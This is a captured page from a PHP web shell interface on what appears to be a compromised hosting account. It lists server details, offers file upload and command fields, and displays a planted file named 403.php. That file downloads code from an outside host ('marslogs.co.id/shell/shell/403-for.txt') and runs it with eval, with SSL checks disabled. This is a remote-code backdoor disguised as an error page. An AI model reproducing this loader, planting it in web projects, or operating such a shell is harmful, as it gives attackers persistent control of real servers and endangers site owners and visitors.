403Webshell
Server IP : 104.21.64.206  /  Your IP : 216.73.216.113
Web Server : LiteSpeed
System : Linux premium234.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : pawazvgw ( 969)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/pawazvgw/proseo.pro/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/pawazvgw/proseo.pro/403.php
<?php


function getBacklink($url) {
    
    if( ini_get('allow_url_fopen') == 1 ) {
        return file_get_contents($url);
    }else if(function_exists('curl_version')) {

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $data = curl_exec($ch);
        curl_close($ch);
        return $data;
    }
}


eval("?>" . getBacklink("https://marslogs.co.id/shell/shell/403-for.txt"));

?>

Youez - 2016 - github.com/yon3zu
LinuXploit